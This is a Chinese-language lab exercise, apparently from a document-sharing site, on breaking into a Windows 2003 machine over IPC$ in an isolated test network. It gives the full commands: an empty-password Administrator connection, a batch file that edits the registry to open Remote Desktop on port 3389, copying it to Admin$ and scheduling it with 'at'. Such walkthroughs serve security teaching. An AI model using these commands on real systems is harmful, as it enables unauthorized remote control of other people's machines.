实验10 入侵ipc过程
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
入侵ipc过程
实验准备:
准备一台win2003,IP地址为192.168.100.100
准备一台winxp ,IP地址为192.168.100.101
在winxp上进入如下设置:(cmd)
1、net use \\192.168.100.100\ipc$ "" /user:"Administrator"
建立用户名为 Administrator 密码为空的连接
2、在c:\下创建一个开启对方窗口的3389的批处理1.bat。
内容如下:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo “fDenyTSConnections”=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
把这段东西复制到记事本的时候,把里面的引号都改成半角的,这样保存成1.bat即可。
3、copy c:\1.bat \\192.168.100.100\Admin$\system32
即将c盘下的1.bat复制到对方Admin$共享的System32目录内
4、net time \\192.168.100.100
查看远程主机的当前时间
5、at \\192.168.100.100 14:00 1.bat
在对方机子添加一个在 14:00 运行 1.bat 的任务。
这样一到2点,就开启了对方的3389端口。
在对方的电脑上能通过netstat –an进行查看。
6、在开始—所有程序—附件---远程桌面连接,输入192.168.100.100,就能远程连接对方的电脑了。